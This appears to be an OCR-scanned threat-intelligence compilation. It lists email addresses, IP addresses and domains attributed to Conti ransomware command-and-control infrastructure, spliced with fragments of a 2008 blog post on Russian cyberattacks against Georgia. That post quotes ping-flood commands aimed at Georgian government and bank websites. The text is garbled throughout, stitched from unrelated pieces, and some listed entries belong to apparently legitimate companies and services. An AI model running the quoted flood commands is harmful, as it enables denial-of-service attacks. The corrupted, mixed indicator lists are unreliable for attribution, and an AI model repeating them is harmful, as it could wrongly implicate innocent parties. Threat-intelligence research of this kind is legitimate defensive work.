avamar@gnu[.lgr 
andrej[.]Jsergeev _2020@maill.]ru 
volhvb@exploit[.]Jin 


armata@exploit[.Jim 
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ddivelbiss@divelbiss[.]com 
vruel@blah[.]im 
support@korovka[.]Jname 
support@mprof[.]la 
nrobootbander@jabb[.]Jim 
n4815162342@jabb[.Jim 
nsheppard@jabber[. ]ru 
nsectorzero@jabb[.]im 
arturh76@jabber[. ]ru 
neversay@maill[.]ru 
nitserviceemilabkarov@gmail[.]com 
k[.]startsev@xmppl[. ]jp 
biomechanic3000@xmpp[.]jp 
nnikolal131189@gmail[.]Jcom 
nalec[.]kirsanov@maill[.]ru 
warrenmega@protonmail[.]Jcom 
ahurtado@grundfos[.]com 
joe@flowdataindustries[.]Jcom 
njointofffdsd@protonmail[.Jcom 
basils1991@gmail[.]Jcom 
snowwinter@exploit[.]im 
tiffany[.]Jhuff@levelconsult[.]us 
nrandman@thesecuref. ]biz 
vasilymm@memaill[.]Jcom 
interview _admin@jabb[.]im 
sm0k3 _1337@xmppl.]jp 
uniftorambo@exploit[.]im 
rdpcorp @thesecure[. ]biz 
support@cletricks[.]Jcom 
jee-nospam@jabbin[.]pl 
akonitborec@thesecure[. ]biz 
operathionshieldfr@protonmail[.]com 
DOC ID@exploit[.Jim 
al[.]pro[.]J80@jabb[.Jim 
i72jc910jecuwj72771@creep[.Jim 
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The original [1]real-time OSINT analysis of the Russian cyberattacks against Georgia conducted 
on the 11th of August, not only closed the Russia vs Georgia cyberwar case for me personally, 
but also, once again proved that real-time OSINT is invaluable compared to [2]historical OSINT 
using a commercial social network visualization/data mining tool which cannot and will never 
be able to access the Dark Web, accessible only through real-time [3]CYBERINT practices. 
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The value of real-time OSINT in such [4]people’s information warfare cyberattacks - with 
1953 


emigrant@xmpp[.]jp 
blackmatter _interviews@exploit[.]im 
namso@thesecure[. ]biz 
karal@xmppl[.]jp 
admin@expiro-team[.]biz 
martinx@jabbim[.]cz 
maestros11@jabber[.]ru 
emilyspizza@pimux[.]de 
support@j[.]vip72[.lorg 
support1l@j[.]vip72[.]org 
Kopytinv1997@bk[.]ru 
xvioletta2013@gmail[.]Jcom 
alexmillerl126@outlook[.]com 
Sample IP addresses obtained from internal Conti ransomware gang communications include: 
45[.]14[.]226[.]47 
75[.]151[.]48[.]49 
96[.]93[.]217[.]253 
173[.]163[.]176[.]177 
184[.]146[.]91[.]74 
73[.]128[.]248[.]22 
73[.]31[.]89[.]221 
162[.]244[.]81[.]252 
172[.]83[.]155[.]195 
195[.]123[.]214[.]177 
75[.]147[.]147[.]133 
186[.]72[.]79[.]132 
128[.]199[.]196[.]59 
38[.]88[.]223[.]172 
67[.]243[.]142[.]225 
72[.]214[.]4[.183 
154[.]61[.]71[.]53 
68[.]61[.]238[.]2 
154[.]61[.]71[.]54 
193[.]39[.]185[.]14 
185[.]232[.]23[.]77 
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51[.]132[.]66[.]157 
87[.]166[.]57[.]137 
87[.]166[.]57[.]142 
79[.]112[.]76[.]251 
118[.]127[.]59[.183 
37[.]235[.]53[.]46 
65[.]119[.]186[.]242 
172[.]111[.]149[.]148 
3[.]11[.]85[.134 
196[.]155[.]13[.]118 
162[.]76[.]2[.]1 
185[.]193[.]37[.]222 
5[.]181[.]156[.]166 
185[.]99[.]133[.]115 
89[.]41[.]182[.]52 
193[.]8[.]172[.]239 
194[.]15[.]113[.]92 
5[.]196[.]197[.]27 
162[.]55[.]32[.]162 
31[.]13[.]195[.]184 
193[.]228[.]193[.]57 
179[.]43[.]147[.]243 
117[.]252[.]69[.]134 
117[.]252[.]68[.]15 
117[.]197[.]41[.]36 
117[.]222[.]63[.]77 
45[.]126[.]75[.]91 
63[.]147[.]234[.]198 
195[.]123[.]222[.]97 
24[.]185[.]61[.]99 
75[.]163[.]169[.J121 
172[.]243[.]178[.]252 
174[.]96[.]143[.]3 
198[.]45[.]136[.]28 
173[.]19[.]92[.]26 
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192[.]154[.]176[.]134 
198[.]45[.]181[.]114 
195[.]149[.]87[.]59 
195[.]123[.]212[.]17 
185[.]163[.]45[.]17 
74[.]119[.]217[.]58 
199[.]233[.]235[.]194 
66[.]29[.]138[.]17 
61[.]177[.]172[.]13 
91[.]189[.]92[.]38 
91[.]189[.]92[.]39 
91[.]189[.]92[.]19 
91[.]189[.]92[.]41 
193[.]27[.J228[.]65 
71[.]168[.]131[.]157 
71[.]6[.]199[.]23 
161[.]35[.J126[.]145 
46[.]8[.J157[.J223 
87[.J121[.]52[.J215 
31[.]13[.]195[.]26 
31[.]13[.]195[.]144 
185[.]25[.]48[.]4 
185[.]244[.]41[.]9 
185[.]246[.]152[.J121 
97[.]77[.]191[.]226 
46[.]8[.]23[.]171 
45[.]32[.]131[.]223 
45[.]32[.]132[.]182 
162[.]33[.J177[.]212 
45[.]61[.]136[.]221 
74[.]125[.]196[.]113 
193[.]42[.]37[.]21 
198[.]46[.]198[.]128 
212[.]41[.]24[.]66 
185[.]9[.]18[.]154 


19505 


91[.]193[.]181[.]22 
141[.]94[.]162[.]156 
185[.]177[.]124[.]86 
185[.]189[.]151[.]142 
194[.]76[.J226[.]22 
185[.]219[.]221[.]171 
88[.]119[.]175[.]225 
5[.]34[.]178[.]185 
45[.]11[.]183[.J211 
185[.]25[.]51[.]99 
194[.]76[.J227[.]29 
45[.]11[.]183[.]198 
194[.]135[.]33[.]137 
198[.]46[.]198[.]9 
5[.]2[.]78[.J121 
195[.]149[.]87[.]233 
185[.]158[.]249[.]249 
31[.]214[.]157[.]242 
38[.]92[.]176[.]125 
195[.]123[.]219[.182 
185[.]158[.]249[.]119 
23[.]146[.]242[.]134 
51[.]38[.]95[.]29 
46[.]19[.]136[.]221 
142[.]4[.J211[.]167 
195[.]123[.]221[.]248 
37[.]187[.]24[.J215 
5[.]34[.]181[.]18 
194[.]76[.J225[.]152 
213[.]252[.]245[.]181 
185[.]25[.]48[.]83 
5[.]183[.]95[.]6 
185[.]99[.]132[.]248 
158[.]69[.]133[.]72 
23[.]254[.]228[.]234 
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194[.]36[.]191[.]19 
38[.]92[.]191[.]89 
5[.]2[.]78[.137 
198[.]244[.]194[.14 
45[.]14[.]226[.]23 
185[.]38[.]185[.]13 
139[.]28[.]235[.]177 
185[.]99[.J132[.]67 
192[.]99[.]255[.]38 
142[.]11[.J253[.]72 
83[.]242[.]96[.]193 
188[.]127[.]226[.]236 
195[.]123[.]222[.]91 
162[.]33[.]179[.]125 
5[.]181[.]156[.]15 
162[.]33[.]178[.]178 
45[.]61[.]138[.]153 
195[.]123[.]228[.]5 
195[.]123[.]228[.]6 
194[.]135[.]33[.]191 


Related responding domains known to have participated in Conti ransomware gang’s C &C 
(Command and Control) and Internet connected infrastructure include: 


*[. Jbuyessayfriend[.]cloudns[.]cx 

000ec604[. ]familyfight53[. info 

0026ef9c[. ]familyfight53[.]info 

002d30c4[.]familyfight53[.]info 

00425578[.]familyfight53[. info 

004488ee|[. ]familyfight53[.]info 

10440-18430[.]bacloud[.]info 

11675-21284[.]bacloud[.]info 

162-33-177-212[.]cprapid[.]Jcom 

172-111-149-148[.]6530a339d9e4441c83d6fd87a49f4622[.]plex[.Jdirec t 

173-19-92-26[.]client[.]mchsi[.Jcom 

185-177-124-86[.]hosted-by-worldstream[.]net 

193-228-193-57[.]1812badd1d11400a9315c133332f7758[.]plex[.]Jdirect 

193-228-193-57[.]1d40dc22575240ba9cf396ee0287f0c8[.]plex[.]direct 
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193-228-193-57[.]21b6591d9dfcd43b985058eba64f87915[. ]plex[.]direct 
193-228-193-57[.]49dc1308fdd541d9ba4ba1187a200ba3[.]plex[.]direct 
193-228-193-57[.]5e4c3d81669b4896bd8f90bc52157a50[.]plex[.]direct 
194-135-33-137[.]static[.]ktkru[.]ru 
194-135-33-191[.]static[.]ktkru[.Jru 

195-123-214-177[.]cprapid[.Jcom 

1fc22ada332d1bb/7[.]yahoodns[.]org 

21[.]3Imf[.]st 

2393datasw2[.]xyz 

2d37de/7fbfed0a26[.]xxgoogle[.]net 

2vpn[.]net 
37-235-53-46[.]8601le2ecce28438dbb07c50b2d631443[.]plex[.]direct 
37-235-53-46[.]acc466cbb1ba44b880502d2ef19803c2[.]plex[.]direct 
37-235-53-46[.]b9f5982631c148e78b8de349cele3bb8[.]plex[.]direct 
37-235-53-46[.]e9e2ed484ffc4837al14d6f38f1a84al11[. ]plex[.]direct 
429861cf22[.]testfor[.]duckdns[.Jorg 

45-14-226-23[.]cprapid[.Jcom 

Agyq[.]ribsty[.]Jcom 

52ca5fb0effa72c9[.]akamaihd[.]org 

55[.]3lm[.]st 

5jzd[.]qtave[.]space 

5m/7[.]srfsanantonio[.]lorg 
63d8801ada3d0d1a2693dd3281b609169b02fcf3[.]104[.Jmjuyh[.Jcom 
75-163-169-121[.]clsp[.]qwest[.]net 
79-112-76-251[.]6d95ad37c0264feea8a53c7b06e29134[.]plex[.]direct 
79-112-76-251[.]fa77633e15b141ddac974546fbe5b34e[. ]plex[.]direct 
7a2378fc5c12e5ef[.]facebook[.]lorg 

7mwo[.]sy7777[.]cn 

88xyz[.]xyz 

8f310[.Jcom 

8f777[.]info 

912[.]rbx[.Jabcvg[.Jovh 

914eb65169d61852[.]Jakamaihd[.]org 
91[.]189[.]92[.]38[.]ip[.]netboxblue[.Jcom 
91[.]189[.]92[.]41[.]Jip[.]netboxblue[.Jcom 
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96-93-217-253-static[.]hfc[.]comcastbusiness[.]net 

9879-17568[. ]bacloud[.]info 

9bcf2a4cb09d9bae[. ]akamaihd[.]com 
9p4[.Jinvestmentparadigms|[.]Jcom 

9sb[.]sy7777[.]cn 

9txh9[.]1bj[.]qtave[.]Jspace 

9zr0kholj4sO[.Jru 

_dnslink[.]burelom[.]com[.]ru 

al3[.]vifes[.]bid 
a496d52aa5a763221014222b85al13a3edfdd1fff[.]107[.]mjuyh[.Jcom 


aa34584bba458a0c0f5b9ea70091leb2abaf369a2e281608dbf[.]www2[.]bestekl 
gen[.]Jcom 


abnerdasilvarodrigues19834[.]pserver[.]ru 
abnnamro-betaalpas[.]services 
accoto[.]Jonline 

ad8rwofhas[. ]testfor[.]duckdns[.]org 
admin[. Jiticket[.]md 
admin[.]melanett[. ]Jru 

ajustes[. ]digital 

alaskagova[.]com 

amazon. ]de-use-amaf[. ]tk 
amazon[.]de-useama|[.]ga 
amazon[.]de-useama[.]ml 

amazon. ]de-useamaf[.]tk 
api[.]charmhub[.]io 
apil.]sfapcraft[.]io 
api[.]snapcbaft[.]io 
api[.]snapcraft[.]io 
api[.]soapcraft[.]io 

aqacidom[.]com 
asmpx[.]playtimeor[.]com 
asoexample[.]site 
assertions[.]ubuntu[.]com 
attest-moreover[.]blogogram[.]net 
attest-moreover[.]healthevil[.]Jcom 
autodiscover[.]keystonecollections[.]com 


einwa- 
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autodiscover[.]keystonedesigner[.]com 
autodiscover[.]stonesriverelectric[.]com 
avatz[.]dealssock[.]com 
axelrod[.]duckdns[.]org 
backup[.]fahmi[.]me 
backup[.]theepicbrowser[.]com 
barracuda[.]Jolimail[.]ru 
bartholaraka[.]com 
baykusmusicstore[.]Jcom 
bhal.]feldalo[.]club 

biekekyw[.]com 
bindolsmaoldmsozlas[.]site 
blankporinternt-registrointebk[.]site 
blg1[.]kernvpn[.]Jcom 
blog[.]food[.]supershopping[.]publicvm[.Jcom 
blog[.]salem80[.]info 

brighIness[.]review 

byOts[.]net 
c-68-61-238-2[.]hsd1[.]mil.]Jcomcast[.]net 
c-73-128-248-22[.]hsd1[.]md[.]Jcomcast[.]net 
c-73-31-89-221[.]hsd1[.]wv[.]comcast[.]net 
c778123[.]soddns[.]com 
candabare[.]com 

cardd[.]top 

cdn[.]f5c[.]Jde 

cdn[.]vip8f[.]Jcom 

ch19[.]zenguard[.]org 

chanta[.]Jcam 

chat[.]blockchainfol[. info 
christiandior[.]lbag[.Jorg 
citrix4[.]Inbyb[.Jcom 

cloud[.]55[.]3lm[.]st 
cmpmarineproducts[.]com 
cms2020[.]e-consulta[.]com 
coach[.]lbag[.Jorg 
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configwells-2yn[.]com 
confluence[.]globall-security[.]Jcom 
contestep[.]com 
cpanel[.]ihsosa[.]co 
cpe-174-96-143-3[.]carolina[.]res[.]rr[.Jcom 
cpe-174-96-143-3[.]columbus[. ]res[.]rr[.Jcom 
cpe-67-243-142-225[.]nyc[.]res[.Jrr[.Jcom 
cse[.]google[.]ng 
cshands[.]best 
ctx4[.]Inbyb[.]Jcom 
cybernus[.]duckdns[.]org 
d-28040579341013730754[.]ampproject[.]net 
d-30510081421664060215[.]ampproject[.]net 
d-35273772303728331404[.]ampproject[.]net 
d-37645716243900328328[.lampproject[.]net 
d23804-vultr-silicon-valley-boxull[.]teridions[.]net 
d93xd[.]9dp[.]qtave[.]space 
d[.]kirikira[.]moe 
datacloudhub[.]net 
dc-545605ab9f23[.]sweetlittlemodels[.]com 
dc-856136954d43[. ]Jet-laws[.]co[.Juk 
dc5yourmaill[.]gq 
decoregold[.]com 
devapil[.Jiticket[.]md 
develop[.]cheapestanalysis[.]Jcom 
developer[.]space 
devild[.Jcom 
dns2[.Joldil.]life 
doedoe[.]best 
dontpanicarts[.]com 
e-medservices[.]net 
ec2-3-11-85-34[.]eu-west-2[.]compute[.]amazonaws[.]com 
egorkamud[.]com[.]ru 
einstein[.]census[.]shodan[.]io 
elasgia[.]ecolinkshop[. ]ru 

19511 


encoding[.]3speak[.]online 
enigma-hg[.]net 
entum[.]Jextremember[.]us 
f12c908d164ef622[.]yahoodns[.]Jedu 
fluxyxbot[.]tk 

ftp[.]bestcom[.]be 
ftp[.Jitonsupport777[.]ru 

ftp[. ]kabukevimurda[.]xyz 
gO[.]deidukas[.]Jcom 
garethnz1[.]gleeze[.]Jcom 
globall-security[.]com 
google[.]coinbase[.]com[.]zendezksupportsystem[.]com 
gruminoger[.]ru 
gusty[.]obtainaqua[.]com 
guyjsu[.]club 
gw1[.]mad1[.]frostvpn[.Jcom 
gxoperabrowser[.]com 
helpdesk[.]cpven[.]Jcom 
hgamefreeO1[.]info 
homenet[.]ddnsking[.]com 
hwsrv-870907[.]hostwindsdns[.]com 
hwsrv-935575[.]hostwindsdns[.]com 
i09ne97[.]sy7777[.]cn 
ibanverificatie-marktplaats[.]one 
ideal-ing[.Jonline 

ideal-tikkie[.]xyz 
ignis[.]minutions[.]Jcom 
imap[.]f5c[.]Jde 

ing-betaalpaginal[.]n 
ip29[.]Jip-51-38-95[.Jeu 
irmingha[.]Jecolink24[.]ru 
irripedia[.]ecolinkshop[.]ru 
isecurity[.]website 
jh153[.]perfectdeals[.]xyz 

jimk[.]org 
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[5]Chinese hacktivists perfectly aware of the [6]meaning of the phrase - relies on the rel- 
atively lower operational security (OPSEC) the initiators of a particular campaign apply at 
the beginning, so that it would scale faster and attract more participants. What the Russian 
government was doing is fueling the (cyber) fire - literally, since all it takes for a collectivist 
socienty’s cyber militia to organize, is a "call for action" which was taking place at the majority 
of forums, with the posters of these messages apparently using a spamming application to 
achieve better efficiency. 


[7]The results from 56 days of [8]Project Grey Goose in action got published last week, 
a project [9]I discussed back in August, point out to the bottom of the food chain in the entire 
Campaign - stopgeorgia.ru : 


OduuManbHpl4 BeGcavtT NpesugeHta [py3uu ping -n 5000 -| 1000 www.president.gov.ge -t 
Npasutensbctso [pysuuv ping -n 5000 -| 1000 www.government.gov.ge -t 

Napnament Fpy3uu ping -n 5000 -| 1000 www.parliament.ge -t 

MMA Tpy3uu ping -n 5000 -| 1000 www.mfa.gov.ge -t 

MBA [py3uu ping -n 5000 -| 1000 www.police.ge -+t 

MO [py2uu ping -n 5000 -| 1000 www.mod.gov.ge -t 

Muxuctepctso duxaHcos Fpy3un ping -n 5000 -| 1000 www.mof.ge -+t 

HauMoHanbHbi BaHk [pysuu ping -n 5000 -| 1000 www.nbg.v.gego -t 


"Furthermore, coming up with [10]Social Network analysis of the cyberattacks would produce 
nothing more but a few fancy graphs of over enthusiastic Russian netizen’s distributing 
the static list of the targets. The real conversations, as always, are [1l1]Jhappening in the 
"Dark Web" limiting the possibilities for open source intelligence using a data mining soft- 
ware. Things changed, OPSEC is slowly emerging as a concept among malicious parties, 
whenever some of the "calls for action" in the DDoS attacks were posted at mainstream fo- 
rums, they were immediately removed so that they don’t show up in such academic initiatives" 


So what’s the bottom line? Nothing that | haven’t already pointed out back in August : 
"[12]Report: Russian Hacker Forums Fueled Georgia Cyber Attacks" : 


"But experts say evidence suggests that Russian officials did little to discourage the on- 
line assault, which was coordinated through a Russian online forum that appeared to have 
been prepped with target lists and details about Georgian Web site vulnerabilities well before 
the two countries engaged in a brief but deadly ground, sea and air war." 


[13]Some more comments : 


"Just because there was no smoking gun doesn’t mean there’s no connection," said Jeff 
Carr, the principal investigator of Project Grey Goose, a group of around 15 computer security, 
technology and intelligence experts that investigated the August attacks against Georgia. "I 
can’t imagine that this came together sporadically," he said. "| don’t think that a disorganized 
group can coalesce in 24 hours with its own processes in place. That just doesn’t make sense." 
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juejincn[.Jcom 

kigsyndivinil.]ru 

kloi-area[.]Jcom 

langyodh[.]xyz 
led-foglights[.]Jcom 
leebarnesprofessionall.]startecommercenow|[.]com 
login[.]traveltogo[.]ru 
Isdnode[.]go[.]ro 
lv-ri-best[.]classicstudio[.]org 
lv-ri-best[.]classicstudiodev[. ]ru 
m[.]Jiunosti[.]Jcom 
mac000e5332daae[.]ddns[.]eagleeyes[.]tw 
mailO1[.]traveltogo[.]ru 
mail2[.]sinewavecompany[.]com 
mail[.]45-14-226-23[.]cprapid[.]com 
mail[.]55[.]3lm[.]st 
mail[.Jaccoto[.]online 
mail[.]armalavage[.]com 
maill.Jasoexample[.]site 
mail[.]Jcardd[.]top 
mail[.]Jchenaa9af[.]icu 
mail[.]Jcontestep[.]com 
mail[.]cvvdata[.]com 
mail[.]e-medservices[.]net 
maill.Jgfgxfh[.Jicu 
mail[.]hudson-properties[.]com 
mail[.]keystonecollections[.]com 
maill.]keystonedesigner[.]com 
maill[.]lightincorporated[.Jcom 
mail[.]lm-business[.]ru 
mail[.]martinswood[.]com 
mail[.]pervertium[.]Jcom 
mail[.]shibat[.]info 
mail[.]sozomanga[.]gq 


maill[.]stonesriverelectric[.]com 
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mailgate[.Jolimail[.]ru 
mailx[.]sinewavecompany[.]com 
manualhold[.]Jcom 
metamask-io[.]lourdesviajes[.]com 
micwin[.]duckdns[.]org 
migaradoreki[.]platf[.]4pu[.]com 
minecraft[.]seriousortroll[.Jcom 
mob20212[.]e-consulta[.]com 
mob2021[.Je-consulta[.]com 
mt[.]stonesriverelectric[.]com 
mta7[.]brightlinks[.]press 
music[.]ykqgame[.]com 
mx01[.]sinewavecompany[.]com 
mx4-242[.]nam-platform[.]com 
mx[.]byOts[.]net 
myanimeshare[.]info 
nestlemestle[.]ru 
newmail[.]sinewavecompany[.]com 
newsletter[.]surf 
nolokiopo[.]xyz 
ns1[.Jairvpscomp[.]Jcom 
ns1[.Jallupon[.]top 
ns1[.]busand[.]xyz 
ns1[.]Jcontestep[.]com 
ns1[.]doedoe[.]best 
ns1[.Jiunostil.Jcom 
ns1[.]kaarinam[.]Jonline 
ns1[.]pervertium[.]com 
ns1[.]rackscozy[.]net 
ns2[.]crewaqua[.]net 
ns3204284[.]ip-141-94-162[.]eu 
nurosolo[.]com[. ]ru 

oboi-ufal[.]ru 

ohoy[.]booift[.]Jcom 
ohres[.]platinumdaily[.]net 
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one[.]kyouryuclub[. info 
ool-18b93d63[.]dyn[.]Joptonline[.]net 
opere13029203[.]ddns[.]net 
ourvoisil.Jecolinkshop[.]ru 
outlook[.]live[.]Jcom[.]zendezksupportsystem[.]com 
owal[.]stonesriverelectric[.]Jcom 
p54[.]sieveconsulting[.]com 
p57a63989[.]dipO[.]t-ipconnect[.Jde 
pa365[.]co 

pad[.]3lm[.]st 

panel[.]melanett[.]ru 
pepethepet[.]startecommercenow[.]com 
pervertium[.]com 
phjf[.]Optybh[.]qtavel[.]space 

pipen[.]info 
pool-71-168-131-157[.]cmdnnj[.]fios[.]verizon[.]net 
pop3[.]cliboy[.Jcom 

portymara[.]com 

projects[.]f5c[.Jde 

prossl[.]ru 

pruebadedatos[.]ddns[.]net 

qimadh[.]xyz 

qly7[.]kansasemkt[.]com 
r01[.]deidukas[.]com 

radio[.]pom 

react[.]municipiospueblal[.]mx 
record-using[.]verileague[.]com 
relaxed-dijkstra[.]5-181-156-166[.]plesk[.]page 
remote[.]baldeaglesecurity[.]Jcom 
remote[. ]Inbyb[.]com 
repro210392194[.]ddns[.]net 
rlalonarwa[.]xyz 
rrcs-192-154-176-134[.]sw[.]biz[.Jrr[.Jcom 
rres-97-77-191-226[.]sw[.]biz[.Jrr[.Jcom 


rtmp[.]3speak[.Jonline 
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s3[.]Jitonsupport777[.]ru 
sau-6bc8f-or[.]servercontrol[.]com[.]au 
savorthebite[.]startecommercenow|[.]com 
search[.]apps[.]ubunte[.]Jcom 
search[.]apps[.]ubuntu[.]col 
searci[.]lapps[.]ubuntu[.]com 
seine-eloquenz[.]de 

selffarmal[.]biz 

selffarma[.]net 

selfpharma[.]be 

server[.]bctyhf[.]bar 
services[.Jact2day[.]ru 

shodan[. ]blocked[.]Jexasol[.]com 
shop[.]itonsupport777[.]ru 

shveciil.]ru 
signin[.]ebey[.]co[.]uk-app[.]pro 
sky-q[.]ru 

smtp065[.]curerobert[.]Jcom 
smtp1120[.]rackscozy[.]net 
smtp2[.Jolimail[.]ru 
smtp[.]condorsp[.]com 
smtp[.]consepetro[.]com 
smtp[.]cpven[.]Jcom 
smtp[.]traveltogo[.]ru 

socalfd[.]info 

soro[.]cpven[.]Jcom 

sport32[.]site 
srv-141-98-11-27[.]serveroffer[.]net[.]5-181-156-166[.]plesk[ .]page 
srv32[.]fastday1[.]Jcom 
static[.]162[.]32[.]55[.]162[.]clients[.]your-serve r[.]de 
stdar[.]ru 

streaming[.]as88[. Jlive 
stylesgrab[.]Jcom 

super[. ]topfangx[.]com 
ten[.]broarh[.linfo 
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test1[.Jitonsupport777[.]ru 
test[.]byOts[.]net 
theepicbrowser[.]com 
theory[.]clickblatt[.]info 
tikkie-pay[.]com 

tmt[.]380112[.]xyz 

tonsnuewe[.]tk 
toroon0628w-lp130-02-184-146-91-74[.]dsl[.]bell[.Jca 
tosc[.]Jdnshome[.]de 
ts[.]konebitz[.]Jcom 
ttl-6000[.]test82538[.]mntest[.Jcom 
twgameserver[.]vqof2dqvqd-xIm4179nr4dy[. ]p[.]Jruncloud[. ]link 
u11[.]protonvideo[.]to 

uhxibx[.]club 

upgittas[.]Jcom 
uplin[.]k-in-gov[.]site 
usw[.]theepicbrowser[.]com 
v11[.]phephim[.]xyz 
vnpt[.]duckdns[.]org 

wb5nfc[.]net 

web[.]traveltogo[.]ru 
webdisk[.]ubxil[.]info 
webmaill[.]xinxo[.]co 
whitefeatured[.]com 
whois[.]Jitonsupport777[.]ru 
windowsupdatepacks[.]win 
writing-roadmap[.]writing-service[.]selfip[.]Jcom 
wusudh[. ]xyz 
www2-ill[.]Jinois-gov[. live 
www2[.]Jamazon-oc[.]cam 
www2[.]google[.]com 
www[.]88xxx[.]xyz 
wwwl(.]8fggg[.]Jcom 
wwwl[.]8xxxx[.]xyz 


wwwl[.]Jabnnamro-betaalpas[.]services 
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www/I[.lajustes[. ]digital 
www[.]Jalaskagova[.]Jcom 
www[.Jasgyyya6ychchal. ]xyz 
www[.Jasoexample[.]site 
wwwl.]ate-co-us[.]site 
wwwl[.]bartholaraka[.]Jcom 
wwwI![.]beman[.]ru 
wwwl[.]bestcom|[.]be 
www[.]biekekyw[.]com 
www[.]bitavey[.]Jcom 
wwwl.]byOts[.]net 
wwwl.]ca-assistance[.]co 
www[.]cardd[.]top 
wwwl.]coolness[.]science 
wwwl.]diavol-news[.]net 
wwwl.|diplom-iq[.]ru 
wwwl.len[.]f5c[.Jde 
wwwl.lenigma-ha[.]net 
www[.]fuuhwyyw[.]com 
www [.]galopover[.]com[.]ru 
www [.]globall-security[.]Jcom 
www [.]gxoperal[.]com 
www[.]hgamefreeO1[.]Jinfo 
www/l.]ideal-ing[.]me 
www/I[.]lihsosa[.]Jorg 
wwwl.liticket[.]md 

www. ]juejincn[.]com 

www [.]k-in-gov[. ]life 

www [.]kigsyndivinil[.]ru 
www/I[.]led-foglights[.]Jcom 
wwwIl.]lumirror[. info 
wwwl[.]megapesnil.]net 
wwwl[.]melanett[.]ru 
wwwIl[.]molore[.]com 

www [.]navercorpc[.]website 
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wwwl.lolimail[.Jru 
wwwl.jom-s[.]ru 
wwwl.]panipatiko[.]ml 
wwwl[.]paypal-fraud-department[.]com 
www[.]pchanel[.]Jcom 
www[.]pervertium[.]com 
www/[.]playinstall[.Jcom 
wwwl.]gimadh[.]xyz 
wwwl.]radio[.]pm 
wwwl[.]sky-g[.]ru 
wwwl.]sport32[.]site 

www. ]stafadut[.Jasia 
wwwl[.]stdar[.]ru 
wwwl[.]supercvyv[.]cc 
wwwI[.]sutdrdt[.]Jcom 
wwwl.]|sy7777[.]cn 
wwwl[.]vektor-soft[.]ru 

www [.]z-kmf[.]ru 

xvpise[.]rg[.]ro 

xz3lzn[.]3htI[. ]qtavel[.]space 
zafie[.]ru 

ziukai[. ]itsybitsyintelligent[.]Jcom 
zslrurvqpvbjgfgo[.]myfritz[.]net 
zuj[.Jalinashop[.]ddns[.]info 


Related responding domains known to have participated in Conti ransomware gang’s C &C 


(Command and Control) and Internet connected infrastructure include: 


O020lg[.]net 
021gszc[.]net 
O24hssy[.]com 
0411cp[.Jcom 
0595ee[.]com 
06fanli[.]Jcom 
0755google[.]com 
0769baofeil.]Jcom 
091218[.]Jcom 


Oxxs[.]Jcom 
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10000jx[.]Jcom 
100dI[.]net 
120q[.]net 
12580cf[.]Jcom 
126nb[.]Jcom 
135208[.]Jcom 
15jzh[.]Jcom 
163gck[.]net 
166681[.]Jcom 
1688gzf[.]Jcom 
170452[.]Jcom 
17beyond[.]Jcom 
1lshang[.]net 
2008-08-08[.]com 
2012njanmo[.Jcom 
21[.]3Ilm[.]st 
2393datasw2[.]xyz 
24designerreplica[.]com 
2vpn[.]net 
3181302[.]Jcom 
3576116954@qq[.]com 
35jk[.]net 
360efang[.]Jcom 
371886[.]Jcom 
373hx[.]com 
39gk[.]net 
3wfdpt-prime[.]Jcom 
4008110518[.]com 
458rxk[.]com 
518idc[.]net 
518lunwennet[.]com 
51pinche[.]net 
51twp[.]com 
51zhenggian[.]net 
520zhika[.]Jcom 
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52qiandeng[.]Jcom 
55[.]3lm[.]st 
5bac[.]Jcom 
5i43[.]net 
61bxg[.Jcom 
6eur[.]Jcom 
6icc[.]Jcom 
6zon[.]com 
6zyy[.]Jcom 
7297kennell[.Jcom 
7d60[.Jcom 
8484t[.]Jcom 
86eshop[.]com 
88xyz[.]xyz 
8f310[.]Jcom 
8f777[.]info 
9-here[.]com 
911gm[.]Jcom 
942go[.]Jcom 
94ywg[.]com 
958tuan[.]com 
988wI[.]net 
99jcshop[.]com 
9dxt[.]Jcom 
9zr0kholj4sO[.Jru 


Related Conti ransomware gang’s C &C (Command and Control) domain registrant personal 
email address accounts known to have been used by the gang include: 


Related responding domains known to have participated in Conti ransomware gang’s C &C 
(Command and Control) and Internet connected infrastructure include: 


Related responding domains known to have participated in Conti ransomware gang’s C &C 
(Command and Control) and Internet connected infrastructure include: 


Venom96669@gmaill.]Jcom 
a400plc[.]Jcom 
abbieswine[.]com 
abnnamro-betaalpas[.]services 
accoto[.Jonline 
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acheshil.Jcom 
afpkaoshil[.]Jcom 
aftym[.]Jcom 
aguijianshen[.]Jcom 
ahsheying[.]Jcom 
aidesen[.]net 
aixiaodu[.]Jcom 
ajustes[.]digital 
alanah-rae[.]net 
alaskagova[.]com 
amoyhu[.]com 
anqinghotel[.]com 
aolaixin[.]com 
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It wouldn’t make sense if this was the first time Russian hacktivists are maintaining the same 
rhythm as real-life events - [14]which of course isn’t. 


Moreover, exactly what would have constituted a "smoking gun" proving that the Rus- 
sian government was involved in the campaign, remains unknown - I’m still sticking to my 
comment regarding [15]the web site defacement creative. If they truly wanted to compromise 
themselves, they would have cut Georgia off the Internet, at least from the perspective offered 
by this graph courtesy of the [16]Packet Clearing House speaking for their dependability on 
Russian ISPs. 


As for [17]the script kiddies at stopgeorgia.ru, [18]they were informed enough to fea- 
ture my research into their "negative public comments section". To sum up - the "DoS battle 
stations operational in the name of the "/19]Please, input your cause" mentality is always 
going to be there. 


ftp: //bloge “zdnet. con/security/?p-1676 
_ http://www. scritd,con/doc/6967359/Project-Grey-Coose-Phase- I-Report 
| http://adanchey blogspot. con/2006/09/cyber~intel Lagence-cyberint nt 
_http://adanchev blogspot .con/2007/10/peoples~ infornation-vartare~concept. Hal 
_http://adanchey blogspot. con/2008/04/chinese-hacktivists-vaging-peoples. nt 
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. http: //intelfusion.net/wordpress/?p=398 


. http: //ddanchev.blogspot.com/2008/09/summarizing- augusts-threatscape.htm 


15; 
16 


ttp://74.125.39.104/search?hl=enkq=cache/3Astopgeorgia.ruj2F/,3Fpg/3Dserkaq=f koq 


19. http://www.alexandrasamuel .com/dissertation/pdfs/Samuel-Hacktivism-entire. pdf 


1955 


best001[.]net 
bestaiongold[.]com 
bestseu[.]com 
biekekyw[.]com 
bindolsmaoldmsozlas[. ]site 
bingdianfeidian[.]com 
bj-tj[.]com 
bj51888[.]Jcom 
bjbaojiewang[.]com 
bjchix[.]Jcom 
bjdiaosu[.]net 
bjjzks[.]Jcom 
bjk321[.]Jcom 
bjkaicheng[.]Jcom 
bjlbbb[.]Jcom 
bjlbjy[.]Jcom 
bjlncyy[.]com 
bjrqgs[.]Jcom 
bjyuhe[.]Jcom 
bjzxhb[.]Jcom 
bjzzhi[.]com 
blankporinternt-registrointebk[. site 
blogcoward[.]com 
